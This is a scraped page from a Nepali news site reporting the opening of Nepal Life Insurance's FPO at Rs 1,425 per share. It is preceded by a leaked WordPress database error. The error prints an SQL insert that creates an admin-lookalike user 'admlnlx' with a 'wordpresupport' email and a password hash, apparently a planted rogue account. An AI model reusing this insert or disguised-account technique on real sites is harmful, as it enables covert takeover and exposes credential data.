WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjdJ25KNH.HicINDXE69MJYzU9jYwe/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-08 07:01:09', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
नेपाल लाइफ इन्स्योरेन्सको एफपीओ बिक्री खुला,प्रतिकित्ता १४२५ रुपैयाँ – Gaule Khabar

नेपाल लाइफ इन्स्योरेन्सको एफपीओ बिक्री खुला,प्रतिकित्ता १४२५ रुपैयाँ

नेपाल लाइफ इन्स्योरेन्सको एफपीओ बिक्री खुला,प्रतिकित्ता १४२५ रुपैयाँ

काठमाडौं,पुस २७ –

नेपाल लाइफ इन्स्योरेन्स कम्पनी लिमिटेडको थप सार्वजनिक निष्कासन (एफपीओ) बिक्री खुला भएको छ । कम्पनीले आज (बुधबार)देखि प्रिमियमसहित प्रतिकित्ता १ हजार ४२५ रुपैयाँमा ३० लाख ९६ हजार ४२९ कित्ता एफपीओ निष्कासन गरेको हो । प्रिमियम वापत १ हजार ३२५ र प्रतिसाधारण सेयर मूल्य १ सय रुपैयाँ थप गरी एफपीओ निष्कासन गरेको कम्पनीले जनाएको छ ।

कम्पनीले न्यूनतम १० देखि अधिकतम् ३० हजार ९६० कित्तासम्म खरिदका लागि दरखास्त दिन पाउने भएका छन् । सेयर निष्कासनपछि कम्पनीको चुक्तापुँजी २ अर्ब ४७ करोड ७१ लाख रुपैयाँ पुग्ने छ । हाल कम्पनीमा संस्थापक ७० र सर्वसाधारण ३० प्रतिशत स्वामित्व छ । 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका